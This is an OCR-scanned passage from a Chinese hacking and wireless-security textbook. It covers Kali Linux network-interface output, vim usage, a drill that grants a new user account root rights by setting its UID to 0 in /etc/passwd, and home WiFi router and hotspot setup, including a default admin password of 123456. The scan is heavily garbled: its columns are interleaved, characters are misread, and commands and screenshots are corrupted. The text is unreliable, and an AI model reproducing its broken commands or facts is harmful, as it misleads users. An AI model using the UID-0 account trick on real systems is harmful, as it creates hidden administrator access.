inet 192.168.157.132 netmask 255.255.255.0 broadcast 192.168.157.255 
inet6 fe86::26c:z9ff:fe39:f29c prefixlen 64 scopeid 0x20<link> 
ether 00:0c:29:39:f2:9¢ txqueuelen 1999 [Ethernet) 
RX packets 7258 bytes 5674882 (5.4 MiB) 
RX errors @ dropped @ overruns 6 frane © 
TX packets 1969 bytes 135449 (132.2 KiB) 
TX errors @ dropped 6 overruns @ carrier @ collisions @ 


lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 
inet 127.6.0.1 netnask 255.9.0.6 
inet6 ::1 prefixlen 128 scopeid @xl9<host> 
loop txqueuelen lo90 (Local Loopback) 
RX packets 36 bytes 1992 (1.9 KiB) 
RX errors 6 dropped © overruns 6 frane 9 
TX packets 36 bytes 1992 (1.9 KiB) 
TX errors @ dropped 6 overruns 6 carrier 8 collisions © 


Lane: flags=4163<UP,BROADCAST,RUNNING, MULTICAST> ntu 1598 
inet 192.168.0.114 netmask 255.255.255.9 broadcast 192.168.6.255 
inet5 fe8@::814f:d52c:e332:2ebl prefixlen 64 scopeid 6x29<tink> 
ether e8:4e:96:28:ae:46 txqueuelen 1999 [Ethernet) 

RX packets 2325 bytes 137499 (134.1 KiB) 

RX errors 8 dropped 8 overruns 6 frane 9 

TX packets 194 bytes a349 (8.1 KiB) 

TX errors 6 dropped 6 overruns 6 carrier 9 collisions © 


好 
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人 多 提示 : 

@ eth0 代 表 以 太 网 卡 如 果 有 多 块 网 
卡 ， 会 一 次 为 eth0，ethl1，eth2 这 样 
排列 。 

@ lo 代表 本 地 回环 网 卡 ， 每 个 系统 都 
有 一 个 唯一 的 本 地 回环 。 

e@ wlan0 代 表 无 线 网 卡 ， 如 果 有 多 块 
无 线 网 卡 同 以 太 网 卡 一 样 依次 排列 


为 wlan0，wlan1 这 样 。 


4.10 Kali Linux 系 统 的 文本 编 
辑 器 


在 Kali Linux 系 统 中 ， 目 前 使 用 比较 
多 的 是 vim 编 辑 器 ，vim 具 有 程序 编辑 的 能 
力 ， 可 以 主动 地 以 字体 颜色 辨别 语法 的 正 
确 性 ， 方 便 程序 设计 。 


4.10.1 认识 vim 文 本 编辑 器 


vi 编辑 器 是 所 有 Unix 及 Kali Linux 系 统 
下 标准 的 编辑 器 ， 它 相当 于 Windows 系 统 中 
的 记事 ， 它 的 强大 不 逊色 于 任何 最 新 的 文 
本 编辑 器 。 它 是 使 用 Kali Linux 系 统 中 不 能 
缺少 的 工具 。 对 于 Unix 及 Kali Linux 系 统 的 
任何 版 本 ，vi 编 辑 器 是 完全 相同 的 ， 因 此 熟 
练 掌握 该 编辑 器 是 非常 有 好 处 的 。 

vim 编 辑 器 可 以 当 作 vi 编辑 器 的 升级 版 
本 ， 它 可 以 用 多 种 颜色 的 方式 来 显示 一 些 
特殊 的 信息 ， 依 据 文件 扩展 名 或 者 是 文件 
内 的 开头 信息 ， 判 断 该 文件 的 内 容 从 而 自 
动 的 执行 该 程序 的 语法 判断 ， 再 以 颜色 来 
显示 程序 代码 与 一 般 信息 。 并 且 它 加 入 了 
很 多 额外 的 功能 ， 例 如 支持 正则 表达 式 的 
搜索 、 多 文件 编辑 、 块 复制 ， 等 等 。 


4.10.2 vim 的 三 种 模式 


vim 有 三 种 模式 ， 分 别 是 命令 模式 、 插 
入 模式 、 编 辑 模 式 ， 如 下 图 所 示 。 


熟悉 无 线 网 络 安全 测试 平台 一 一 Kali Linux 系 统 的 基本 操作 


进入 退出 
vifilename 输入 : wq 
; 命令 以 回 车 
A 结束 运行 
插入 模式 编辑 模式 
vim 三 种 模式 的 功能 介绍 如 下 : 


e 命令 模式 (默认 ) : 刚 进入 vim 的 时 
候 ， 默 认 便 是 命令 模式 ， 可 以 复制 
行 ， 删 除 行 等 。 

。 插入 模式 ;可 以 输入 内 容 。 


。 编辑 模式 ， 在 最 下 边 出 现 “，” 时 器 请 


便 进 入 了 编辑 模式 ， 除 进行 编辑 外 国 

还 可 以 输入 诸多 管理 员 命令 。 
vim 三 个 模式 之 间 可 以 自由 切换 ， 其 
中 ， 命 令 模 式 可 以 通过 下 面 这 些 快捷 键 切 


换 到 插入 模式 : 

。 i: 在 当前 光标 所 在 字符 的 前 面 ， 转 
为 插入 模式 。 

。 I: 在 当前 光标 所 在 行 的 行 首 转换 为 
插入 模式 。 

。 a: 在 当前 光标 所 在 字符 的 后 面 ， 转 
为 插入 模式 。 

。 A: 在 光标 所 在 行 的 行 尾 ， 转 换 为 
插入 模式 。 


e o: 在 当前 光标 所 在 行 的 下 方 ， 新 建 
一 行 ， 并 转 为 插入 模式 。 
e 0: 在 当前 光标 所 在 行 的 上 方 ， 新 
建 一 行 ， 并 转 为 插入 模式 。 
在 插入 模式 下 ， 可 以 通过 按 下 Esc 键 
切换 为 命令 模式 ， 在 命令 模式 下 ， 输 入 
“: ”可 切换 为 编辑 模式 。 


4.10.3 ”使 用 vim 打 开 文 件 


使 用 vim 打 开 文 件 的 方法 主要 有 以 下 几 
种 ， 下 面 分 别 进行 介绍 : 

(1) vim /path/to/somefile 。vim 后 跟 文 
件 路 径 及 文件 名 ， 如 果 文 件 存 在 ， 则 打开 
编辑 文件 窗口 ， 如 果 文 件 不 存在 ， 则 创建 
文件 。 
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(2) vim +#。 打 开 文 件 ， 并 定位 到 第 # ， [step 贺 使 用 su 命令 切换 到 test001 账 户 ， 执 行 
行 ，# 代表 数字 。 useradd 命 令 ， 发 现 没有 权限 ， 如 下 图 所 示 。 
例如 : 输入 vim +3 /ect/flas.ini 命 令 ， 如 testo01@kali: /home /test$ useradd testo02 


useradd: Permission denied. 


图 人 useradd: cannot lock /etc/passwd; try again later. 
下 图 所 示 。 testo01@kali: /home/test$ 四 


ShoW (or OCT actIon OfTse:s TI 9T5555ENOUY 
g: no offsets 


ne Sa he ne ee 网 注意 : 管理 员 账号 使 用 # 作 为 命令 提示 
howoffset = 9 “人 > Fr 
ed sccnt em | 符 ， 而 普通 用 户 使 用 8 作为 命令 提示 符 。 


(3) vim +。 打 开 文 件 ， 定 位 到 最 后 [Eee 国 使 用 vi 打开 /etc/passwd 文 件 ， 可 以 看 
一 行 5 到 root 账 号 的 用 户 ID 为 0 组 ID 也 为 0， 在 文件 

例如 ， 输 入 vim + /etc/flasm.ini 命 令 ， 如 ”的 末尾 是 新 加 账户 test001, 用 户 ID1000， 如 
下 图 所 示 。 下 图 所 示 。 


TUaTEST IT SET TO TUADTOWSEr, Catls The DrOWSer dTter UPdate [Fle Et View Search Terminal Help 

laplayer = C:\PROGRA~1\FLASHM~1\PLAYERS\SAFLASHPLAYER. EXE 9: root:/root: /bin/bash 

Labrowser ~ C:\PROGRA~I\INTERN~I\IEXPLORE .EXE tp ly ry drer rt red op 
latest = flabrowser ey bedi EssHP 


Sys:/dey: /usr/shin/nologin 
"/etc/flasn,ini" 45L, 1745C 45,1 层 洋 3 Synes /DIn: /dLn/Syne 


(4) vim +/PATTERN。 打 开 文件 ， 定 位 CT 


到 第 一 次 被 PATTERN 匹配 到 的 行 的 行 首 。 | 。 有人 an 


ht et 
例如 : 输入 vim +/fla /etc/flasm.ini 命 本 - 
令 ， 如 下 图 所 示 。 step 园 修改 test001 账 户 ID 为 0， 再 次 切换 账 


i | 大 发 现 [East001 巴 经 为 管理 员 ， .加 再 国 所 元 


Flash 5 and FLash NX only, see “Embedding FLasm code” fn fLasm.htL 
tlaplayer: path to fLash player 

flabrowser: path to flash browser 

on windows, path should contain no spaces, therefore D0s 
flatest: if set to flaplayer, calls the player after upd 
1f set to tlabrowser, catl browser atter ul 


TONS oNon ,VAT7 TUNT VA dan Nr US 7 SD IR NOT OTT 
/run/ polse: /usr/sbin/nologin 


ormat 


‘sbin/nologln 
er: /Yar/ ib/9dm3:/bin/false 
iump :998 9083) Dumper:/:/sbin/nologin 
117:122:+/var/1ib/snap: /bin/false 

/home/ estyel: /bin/bash 


再 次 从 root 账 户 切换 到 test001 账 户 ， 
此 时 test001 已 经 具有 管理 员 权限 ， 如 下 图 
实战 演练 


所 示 。 
Foot@kali: /home/test# su testodl 


实战 演练 1 一 创建 普通 账户 提升 管理 权 EE 
限 


C:\PROGRA~1\FLASHM~1\PLAYERS\SAFLASHPLAYER.. EXE 
[abrowser = C:\PROGRA~L\INTERN~1\IEXPLORE .EXE 
latest ~ flabrowser 
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root@kali: /hone/test# 用 


给 Kali Linux 操 作 系 统 创建 一 个 账户 ， ”实战 演练 2 一 一 通过 命令 获取 到 本 机 IP 
并 修改 该 账号 为 管理 员 权限 。 地 址 


step 回 使 用 adduser 命 令 添 加 一 个 test001 的 账 通过 命令 获取 到 本 地 IP 地 址 可 以 通过 
号 ， 如 下 图 所 示 。 以 下 几 个 步骤 


FOoTOKaLI: /home test# adduser TESEG9T 


|Adding user “test991' ... a step 回 使 用 ifeonfig 命 令 查看 本 机 网 卡 及 IP 地 


Adding new group ‘teste1' 


Adding new user `testb91，(1999) with group ‘testee1' 二 
creating home directory */hone/teste01' ... 址 ， 如 下 图 所 示 。 
[Copying files from ‘/etc/skel’ ... i 
Enter naw MIX passwonds he: flags=4163<UP, BROADCAS™, RUNNING, MULTICAST> mtu 1589 | 
Retype new UNIX password: inet 192-168.5-139 Metaask 255.255.255-© broadcast 192. 168.5.25: 
passwd: password updated successfully inets fe8e: :28c:29f preiixten 64 scopeid 0x26<Link> 
Changing the user information for test991 Te 
Enter the new value, or press ENTER for the default RX errars 8 dropped © overruns 9 frane © 

Full Name []: T packets 478 bytes az285 (41-2 KiB) 


Row Wmbens Ti T errors 日 dropped © overruns 9 carrier 9 collisions ® 


Work Phone []: lo: Piags-Tacup,toopaack,numrhG>， mru 55535 
Home Phone []: er 127.0.9.1 Netmask 255.6.0.0 
; 1 prefixlen 128 scopeid gxlgchost> 
ial Toop txqueuelen 1980 (Local Loopback) 
Is the information correct? [Y/n] y Rx packets 32 bytes 1836 (1.7 KiB) 
Rx errors a dropped 9 overruns © frane © 
TX packets 32 bytes 1836 (1.7 KiB) 
Tx errors 8 drapped © overrins 9 carrier 9 collisions @ 
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[step 图 使 用 ifconfig eth0 命 令 过 滤 掉 本 地 回 
环 地 址 ， 只 显示 出 eth0 外 网 卫 地 址 ， 如 下 图 
所 示 。 


Faatgkaris=y ITcamfig ethg 

上 Etha: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 
net 392,108.5.130 Mornask 255.255 ,2338 bro: 

inet6 fe89::29c:291f,fe7f:3972 prefixlen 6 peid 

ether 0:0e:29771 39.f2 txqueuelen 1900" (Ethernetl 

RX packets 3206 由 238549 [232.9 KiB) 

RX errors 0 dropped © overruns 0 frane © 

er ons aL KiB) 

日 carrier 9 collisio 


TX error s @ dropped 


ee IfeonTig etholgrep “inet" leut dm -Taleut dt -TF 2T 


[192.168"5.130 


4.12 ”小 试 身手 


练习 1: 使 用 cd 命令 与 ls 命令 切换 目录 
并 查看 目录 中 的 内 容 ， 熟 悉 各 个 目录 中 存 


[step 图 使 用 ifconfig er 过 
滤 出 A 内 容 ， 如 下 图 所 示 。 


FoeralLr ITCONTI9 ethol 
inet 192,168.5"130 "netmask 255.255.255.0 broadcast 192.168.5.255 
inet6 _fe88: ;26c:29ffife7f:39f2 prefixlen 64 scopeid 8x20<tinkz 


step 回 使 用 ifconfig eth0lgrep "inet" | cut -d 
- 亿 命 令 ， 过 滤 出 inet 字 段 第 一 行 ， 如 
下 图 所 示 。 


rootBkatis-# ifconfig ethelgrep "inet™ | c 
hot 319216895 130| netnnal 25s |254 255 9° hraadcnst 192.168.5.255 


.9 


step 国 使 用 ifconfig ethOlgrep "inet" | cut -d ":" 
-人 2 | cut -d "t" - 亿 命 令 过 滤 掉 inet 字 段 ， 如 下 
图 所 示 。 


OT Teo IT IE T et To e™ 
192.168.5.130 


TET EE dT 


[ep 图 使 用 ifconfig etholgrep "inet"|cut -d":" 
-人 2|cut -d "t" -f 2|cut -d "n" -有 命令 ， 过 滤 掉 
后 n 字 符 后 面 的 内 容 ， 获 取 到 完整 的 本 机 IP 
地 址 ， 如 下 图 所 示 。 


放 哪 些 文件 。 

练习 2: 使 用 文件 查看 命令 检查 日 志 
信息 。 

练习 3: 试 着 使 用 文件 搜索 命令 查找 需 
要 的 文件 位 置 。 

练习 4: 熟练 使 用 账户 管理 命令 ， 学 会 
如 何 添加 及 删除 账户 。 

练习 5: 试 着 使 用 文件 解压 缩 命令 ， 创 
建 压 缩 文 件 并 解压 ， 对 比 不 同 解压 缩 命 令 
的 区 别 。 

练习 6: 使 用 系统 操作 命令 查看 系统 
进程 。 

练习 7: 熟练 使 用 vi/vim 编 辑 器 ， 学 会 
打开 文件 快速 查找 、 修 改 、 保 存 文件 。 
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第 5 音 ”组 建 无 线 安全 网 络 


在 无 线 局 域 网 WLAN 发 明之 前 ， 人 们 要 想 通过 网 络 进行 联络 和 通信 ， 必 须 先 用 网 线 组 
建 一 个 有 线 网 络 。 不 过 ， 这 种 有 线 网 络 无 论 组 建 、 拆 装 还 是 在 原 有 基础 上 进行 重新 布局 和 


改建 ， 都 非常 困难 ， 且 成 本 和 代价 也 非常 高 ， 


5.1 认识 无 线 局 域 网 

无 线 局 域 网 是 通过 无 线 通信 技术 进行 
组 网 的 一 个 结合 产物 ， 它 采用 无 线 电波 、 
红外 线 或 激光 ， 通 过 无 线 通信 传输 媒介 代 
蔡 传 统 网 线 ， 构 成 传统 无 线 局 域 网 的 功 
能 ， 能 够 使 用 户 随时 、 随 地 进行 上 网 。 


无 线 局 域 网 的 优点 
与 传统 有 线 网 络 相 比 ， 无 线 网 络 具 有 


上 (1) 灵活 性 。 在 有 线 网 络 中 ， 网 络 设 
“ 备 的 安放 位 置 受到 网 络 位 置 的 限制 ， 而 无 
线 网 络 则 没有 ， 只 要 在 信号 覆盖 范围 内 ， 
都 可 以 接 入 网 络 。 

(2) 移动 性 。 无 线 网 络 的 最 大 优点 在 
于 它 的 移动 性 ， 接 入 的 用 户 可 以 在 覆盖 范 
围 内 随意 移动 ， 且 还 能 保持 网 络 的 连接 。 

(3) 方便 安装 。 无 线 网 络 可 以 最 大 程 
度 地 减少 网 络 布线 ， 一 般 只 须 安装 一 个 或 
多 个 接 入 点 设备 ， 这 样 便 可 以 建立 起 一 个 
覆盖 面 广 的 网 络 区 域 。 

(4) 方便 规划 和 调整 。 对 于 有 线 网 络 
而 言 ， 办 公 地 点 或 网 络 拓扑 的 改变 通常 需 
器 要 重新 建 网 ， 而 无 线 网 络 则 可 以 避免 或 减 
- 少 这 些 情况 的 发 生 。 

(5) 故障 定位 容易 。 有 线 网 络 一 旦 出 现 
物理 故障 ， 尤 其 是 由 于 线路 中 断 或 线路 不 
良 造 成 的 网 络 故障 ， 往 往 很 难 查找 原因 ， 
并 且 线 路 检修 也 需要 付出 很 大 的 代价 ， 无 


于 是 无 线 组 网 方式 应 运 而 生 。 


线 网 络 则 不 同 ， 故 障 容易 定位 ， 定 位 后 更 
换 故 障 设备 即 可 恢复 网 络 。 

(6) 易于 扩展 。 无 线 网 络 有 多 种 配置 
方式 ， 可 以 很 快 从 只 有 几 个 用 户 的 小 型 局 
域 网 扩展 到 上 千 用 户 的 大 型 网 络 ， 并 且 还 
有 节点 间 漫 游 的 特性 ， 这 些 是 有 线 网 络 所 
不 能 实现 的 。 


5.1.2 无 线 局 域 网 的 缺点 


无 线 网 络 的 缺点 主要 体现 在 性 能 、 速 率 
与 安全 性 三 个 方面 ， 下 面 进行 详细 介绍 : 

(1) 性 能 。 无 线 网 络 是 依靠 无 线 电波 进 
行 传输 的 ， 因 此 无 线 电 波 受到 遮挡 或 者 其 
他 电波 干扰 都 可 能 阻碍 电磁 波 传输 ， 受 到 
这 些 外 因 影 响 会 直接 导致 网 络 性 能 降低 。 

(2) 速率 。 无 线 信 道 的 传输 速率 与 有 
线 信道 相 比 要 低 得 多 ， 虽 然 无 线 网 络 还 在 
不 断 的 发 展 ， 目 前 已 经 能 达到 最 快 500Mb/s 
的 传输 速率 ， 但 是 与 有 线 网 络 的 千 兆 传输 
速率 相 比 还 是 有 差距 的 。 

(3) 安全 性 。 由 于 无 线 传输 的 特性 导 
致 无 线 传输 是 发 散 的 ， 不 要 求 建立 物理 连 
接 通道 ， 因 此 从 理论 上 讲 ， 很 容易 被 监听 
造成 信息 泄露 。 


5.1.3 无线 局 域 网 的 组 网 模型 


无 线 局 域 网 有 其 方便 灵活 的 特性 ， 当 
然 它 也 有 自己 的 基本 组 网 模型 ， 如 下 图 所 
示 。 该 组 网 模型 的 组 成 元 件 包括 站 点 、 接 
入 点 、 无 线 介质 、 分 布 式 系统 等 。 


接 入 点 


应 


和 荨 洲 出 卦 冰 


一 加 


(1) 站 点 。 配 置 网 络 的 目的 ， 是 为 了 
在 站 点 之 间 传 送 数 据 。 所 谓 站 点 ， 是 指 配 
备 无 线 网 络 接口 的 计算 设备 ， 即 带 有 无 线 
网 卡 的 通信 设备 ， 如 笔记 本 计算 机 、 手 机 、 
iPad 等 无 线 设备 。 

(2) 接 入 点 。 无 线 网 络 所 使 用 的 帧 必 
须 经 过 转换 ， 才 能 被 传递 至 其 他 不 同类 型 
的 无 线 设备 。 有 具备 无 线 至 有 线 桥接 功能 
的 设备 称 为 接 入 点 (简称 AP) ， 如 无 线 局 
域 网 中 的 无 线路 由 器 ， 就 是 一 个 简单 的 接 
入 点 。 

(3) 无 线 介 质 。IEEE 802.11 标准 以 无 
线 介 质 (Wireless medium) 在 工作 站 之 间 
传递 数据 帧 。 其 所 定义 的 物理 层 不 止 一 种 ; 
这 种 架构 允许 多 种 物理 层 同 时 支持 802.11 
MAC - 802.11 最 初 标准 化 了 的 两 种 射频 
(radio frequency， 简 称 RF) 物理 层 以 及 一 
种 红外 线 (infrared ) 物理 层 ， 然 而 事后 证 
明 RF 物理 层 较 受 欢 迎 。 

(4) 分 布 式 系统 。 当 几 个 接 入 点 串联 
以 覆盖 较 大 区 域 时 ， 彼 此 之 间 必 须 相互 通 
信 ， 才 能 够 掌握 移动 式 工作 站 的 行踪 。 
而 分 布 式 系 统 (distribution system) 属于 
802.11 的 逻辑 元 件 ， 负 责 将 帧 frame) 转 
送 至 目的 地 。 


5.1.4 ”认识 无 线 连 接 方式 


说 起 WiFi 大 家 都 知道 可 以 无 线 上 网 ， 
其 实 ，WiFi 是 一 种 无 线 连接 方式 ， 并 不 是 
无 线 网 络 或 者 是 其 他 无 线 设备 。 

WiFi 是 一 个 无 线 网 络 通信 技术 的 品 
牌 ， 由 WiFi 联 盟 (WiFi Alliance) 所 持 有 。 
目的 在 于 改善 基于 IEEE 802.11 标 准 的 无 线 
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网 络 产品 之 间 的 互通 性 。WiFi 联 盟 成 立 于 
1999 年 ， 当 时 的 名 称 叫 作 Wireless Ethernet 
Compatibility Alliance (WECA)， 在 2002 年 
10 月 ， 正 式 改名 为 WiFiAlliance。 

以 前 通过 网 线 连接 计算 机 ， 自 从 有 了 
WiFi 技 术 ， 则 可 以 通过 无 线 电波 来 联网 ; 
常见 的 无 线 网 络 设 备 就 是 一 个 无 线路 由 
器 ， 那 么 在 这 个 无 线路 由 器 的 电波 覆盖 的 
有 效 范 围 内 ， 都 可 以 采用 WiFi 连 接 方式 进 
行 联网 ， 如 果 无 线路 由 器 连接 了 一 条 ADSL 
线路 或 者 别 的 上 网 线路 ， 则 无 线路 由 器 又 
可 以 被 称 为 一 个 “热点 ”。 


5.2 ”组 建 一 个 简单 的 无 线 网 络 


无 线 局 域 网 络 的 搭建 给 无 线 办 公 带 来 
了 很 多 方便 ， 而 且 可 随意 改变 办 公 位 置 而 
不 受 束缚 ， 大 大 适合 了 现代 人 的 追求 。 


5.2.1 搭建 无 线 网 环境 


建立 无 线 局 域 网 的 操作 比较 简单 ， 在 日 
有 线 网 络 到 户 后 ， 用 户 只 须 连 接 一 个 具有 
无 线 WiFi 功 能 的 路 由 器 ， 然 后 各 房间 里 的 
计算 机 、 笔 记 本 计算 机 、 手 机 和 iPad 等 设 
备 利用 无 线 网 卡 与 路 由 器 之 间 建 立 无 线 连 
接 ， 即 可 构建 整个 办 公 室 的 内 部 无 线 局 域 
网 ， 下 图 为 一 个 无 线 局 域 网 连接 示意 图 。 


ADSL/CABEL 


pi 


[2 yy ru TFW3000 无 线 
网 关 
安装 无 线 网 卡 的 
笔记 本 计算 机 一 
和 


起- 
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SS 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


,5.2.2 ”配置 无 线 局 域 网 


建立 无 线 局 域 网 的 第 一 步 就 是 配置 无 
”线路 由 器 ， 默 认 情 况 下 ， 具 有 无 线 功 能 的 
路 由 器 不 开启 无 线 功 能 ， 需 要 用 户 手 动 配 
置 ， 在 开启 了 路 由 器 的 无 线 功 能 后 ， 下 面 
就 可 以 配置 无 线 网 了 。 

使 用 计算 机 配置 无 线 网 的 操作 步骤 
如 下 。 
[step 图 打开 IE 浏览 器 ， 在 地 址 栏 中 输入 路 
由 器 的 网 址 ， 一 般 情 况 下 路 由 器 的 默认 
网 址 为 “192.168.0.1”， 输 入 完毕 后 单 击 
“ 转 至 ”按钮 ， 即 可 打开 路 由 器 的 登录 窗 
口 ， 如 下 图 所 示 。 


DD TLWRBSSN x 和 + a 口 x 
本 © | wie 女 | 三 罗马 …| 
博得 入 管理 员 密 码 
) 
[step 较 在 “请 输入 管理 员 密 码 ” 文 本 框 中 输 


入 管理 员 的 密码 ， 默 认 情 况 下 管理 员 的 密 
码 为 “123456”， 如 下 图 所 示 。 


日 YLwnabsN x* 改 rl 
€ 3 ©O | I 
TP-UNK 

清 答 入 管理 员 密码 

eeeeee 

已 三? 
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[step 图 单 去 “确认 ”按钮 ， 即 可 进入 路 由 器 
的 “运行 状态 ”工作 界面 ， 在 其 中 可 以 查 
看 路 由 器 的 基本 信息 ， 如 下 图 所 示 。 


sn 
荨 已 … 


€ | eman | 


项 ， 在 打开 的 子 选 项 中 选择 “基本 信息 ” 
选项 ， 即 可 在 右 侧 的 窗 格 中 显示 无 线 设置 
的 基本 功能 ， 并 选中 “开始 无 线 功能 ”和 
“开启 SSID 广 播 ” 复 选 框 ， 如 下 图 所 示 。 


口 rwrass x 辆 


- oO x 


女 | BO 


A 


EE 


当 开 启 了 路 由 器 的 无 线 功能 后 ， 单 击 
“保存 ”按钮 进行 保存 ， 然 后 重新 启动 路 
由 器 ， 即 可 完成 无 线 网 的 设置 ， 这 样 具 有 
WiFi 功 能 的 电子 设备 就 可 以 与 路 由 器 进行 
无 线 连 接 ， 从 而 实现 共享 上 网 。 


5.2.3 ”将 计算 机 接 入 无 线 网 


笔记 本 计算 机 具有 无 线 接 入 功能 ， 台 式 
计算 机 要 想 接 入 无 线 网 ， 需 要 购买 相应 的 无 


线 接 收 器 ， 这 里 以 笔记 本 计算 机 为 例 ， 介 绍 
如 何 将 计算 机 接 入 无 线 网 ， 具 体 的 操作 步骤 
如 下 。 

B56 国 双击 笔记 本 计算 机 桌面 右 下 角 的 无 
线 连接 图 标 ， 打 开 “ 网 络 和 共享 中 心 ” 窗 
口 ， 在 其 中 可 以 看 到 计算 机 的 网 络 连接 状 
态 ， 如 下 图 所 示 。 


ET 


”第 “网络 i Inte.。， 网 有 和 共享 中 心 


网 络 信息 并 设置 这 
本 查看 基本 网 络 信息 并 设置 这 六 
7 
a 
Ms 你 且 前 慨 有 连接 到 洗 何 网 才 。 
和 


司 ER 和 
竣 新 并 民 拓 网 洁 问 各 ， 吏 者 下 注 用 交角 答 信 时 


nternet 运 项 
Windowe 1k 塌 
寺 克 得 


[step 园 单 击 笔 记 本 计算 机 桌面 右 下 角 的 无 线 
连接 图 标 ， 在 打开 的 界面 中 显示 了 计算 机 
自动 搜索 的 无 线 设备 和 信号 状态 ， 如 下 图 
所 示 。 


pe 


磊 666666 
大 fomiy 


却 fhpre-H5TF 


硕 TP-UNKI 


zs Tp-U 
多 TP-UNK 


Pe) 


[Eee 图 单 击 一 个 无 线 连 接 设 备 ， 展 开 无 线 
连接 功能 ， 在 其 中 选中 “自动 连接 ” 复 先 
框 ， 单 击 “连接” 按钮 ， 如 下 图 所 示 。 


第 5 章 


组 建 无 线 安全 网 络 


TP-UNK_6666 
元 六 


step 图 在 打开 的 界面 中 输入 无 线 连接 设备 的 
连接 密码 ， 单 击 “下 一 步 ” 按 钮 ， 如 下 图 
所 示 。 


TP-UNKT 
所 


所 mywifi 


step 较 连接 到 网 络 之 后 ， 桌 面 右 下 角 的 无 线 
连接 设备 显示 正常 ， 并 以 弧 线 的 方法 给 出 
信号 的 强 弱 ， 如 下 图 所 示 。 


be 
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[ep 国 再 次 打开 “网 络 和 共享 中 心 ” 窗 口 ， 
在 其 中 可 以 看 到 计算 机 当前 的 连接 状态 ， 
如 下 图 所 示 。 


第 网 结 和 共享 中 心 = 
个 第 “ 网 和 网 阁 和 夫 齐 中心 ~ vb | Sm 7 
控制 面板 主页 查看 基本 网 络 信息 并 设置 连接 
亚运 过 网 丫 
更 PK 二 本 二 设 生 
i i FA: nemet 
ee 尖 WAN 
(PUNKD 
更 改 网 阁 设 轩 


eenns 

设置 完 厦 、 接 或 VPN 这 接 ; 或 设 秆 路 由 器 或 接 入 点 。 
司 且 宇 Re 由 等 

涌 疡 并 修复 网 阁 同 题 ”或 车 获得 是 对 解答 信息 。 


无 线 局 域 网 配置 完成 后 ， 用 户 可 以 将 
手机 接 入 WiFi， 从 而 实现 无 线 上 网 ， 这 里 
以 Android 系 统 为 例 演示 手机 接 入 WiFi 具 体 
操作 步骤 如 下 。 

在 手机 界面 中 用 手指 点 按 “设置 ” 
图 标 ， 进 入 手机 的 “设置 ”界面 ， 如 下 图 
所 示 。 

> i 


T4244 


加 移动 由 络 
© wLAN 已 关闭 
© 让 


侣 其 他 连接 方式 


@ 通知 和 状态 栏 

© et 

四 个 性 主题 

@ 字体 妥 认 

oh 一目 十 小 二 此 
[step 图 使 用 手指 点 按 WLAN 右 侧 的 “已 关 
闭 ”， 开 启 手机 WLAN 功 能 ， 并 自动 搜索 
周围 可 用 的 WLAN， 如 下 图 所 示 。 
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全 © 1 PO 5 
WLAN 


开启 WLAN . 


ChinaNet-HSTF 
TP-LINKT 
TP-UNK? 
TP-LINK_38F156 
TP-UNK_6666 
mpre-HS5TF 


mywif 


© 


step 图 使 用 手指 点 按 可 用 的 WLAN， 弹 出 连接 


界面 ， 在 其 中 输入 相关 密码 ， 如 下 图 所 示 。 


TP-UNK1 


[ee] 


- 
olwlele ll ,ele) 
lslolrlels ull 


到 目 因 日 四 日 四 四 区 
BT- 1 EE 


[step 图 点 按 “ 连 接 ” 按 钮 ， 即 可 将 手机 接 入 
WiFi， 并 在 下 方 显 示 “ 已 连接 ”字样 ， 这 
样 手 机 就 接 入 了 WiFi， 然 后 就 可 以 使 用 手 
机 进行 上 网 了 ， 如 下 图 所 示 。 


Tia S52 日 了 2 Ha Cm so 


WLAN 


开启 WLAN . 


TP-UNK1 


ChinaNet-H5TF 
TP-UNKz 


fhpre-H5TF 


5.3 ”计算 机 和 手机 共享 无 线 上 网 


随 着 手机 上 网 的 普及 ， 计 算 机 和 手机 的 
网 络 是 可 以 互相 共享 的 ， 这 在 一 定 程度 上 方 
便 了 用 户 ， 例 如 ， 如 果 手 机 共享 计算 机 的 网 
络 ， 则 可 以 节省 手机 上 网 产生 的 流量 费用 ; 
如 果 自 己 的 计算 机 不 在 有 线 网 络 环境 中 ， 则 
可 以 利用 手机 的 流量 进行 计算 机 上 网 。 


5.3.1 手机 共享 计算 机 的 网 络 


计算 机 和 手机 网 络 的 共享 需要 借助 
第 三 方 软件 ， 这 样 可 以 使 整个 操作 简单 
方便 ， 这 里 以 借助 “360 免 费 WiFi” 软 件 
为 例 进行 介绍 。 
[step 图 将 计算 机 接 入 WiFi 环 境 当 中 ， 如 下 图 
所 示 。 


| 第 网 和 和 于 可 中 心 口 X 
个 党 ， 网 阁 和 和， 网 阁 和 = 训 二 / 
i 下 看 基本 网 夫 信 息 并 疫 置 连 当 
sors 
ee -== 
ta au 和 
公园 网 涌 ny 
Aa 


如 a 


要 VPN 天 本 : 所 各 且 人 贞 


过 新 个 和 网 涪 采 芋 ， 长 百 从 和 法 加 区 昌 ， 


Esep 贺 在 计算 机 中 安装 “360 免 费 WiFi” 
软件 ， 然 后 打开 其 工作 界面 ， 在 其 中 设置 
WiFi 名 称 与 密码 ， 如 下 图 所 示 。 


Ee 


Fi 名 称 : LB-UNK1 


i 认 码 : 66396639 旋 = 斌 本 


第 5 章 


step 图 打开 手机 的 WLAN 搜 索 功能 ， 可 以 看 
到 搜索 出 来 的 WiFi 名 称 ， 如 这 里 是 LB- 
LINK1， 如 下 图 所 示 。 


[step 四 使 用 手指 点 按 LB-LINK1， 即 可 打开 
WiFi 连 接 界面 ， 在 其 中 输入 密码 ， 如 下 图 
所 示 。 


[Sep 图 点 按 “ 连 接 ” 按 钮 ， 手 机 就 可 以 通过 
计算 机 发 射出 来 的 WiFi 信 号 进行 上 网 了 ， 
如 下 图 所 示 。 


81 


组 建 无 线 安全 网 络 = 


SEE 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


Estee 图 返回 到 计算 机 工作 环境 当中 ， 在 
“360 免 费 WiFi” 的 工作 界面 中 选择 “已 经 
连接 的 手机 ”选项 卡 ， 则 可 以 在 打开 的 界 
面 中 查看 通过 此 计算 机 上 网 的 手机 信息 ， 
如 下 图 所 示 。 


EP 


11 台 手机 安全 上 网 中 ， 无 人 蹲 网 


华为 C8815 
ND om 


遇 5.3.2 计算 机 共享 手机 的 网 络 


手机 可 以 共享 计算 机 的 网 络 ， 计 算 机 也 可 
以 共享 手机 的 网 络 ， 这 里 以 Android 手 机 为 例 
演示 手机 共享 网 络 ， 具 体 的 操作 步骤 如 下 。 
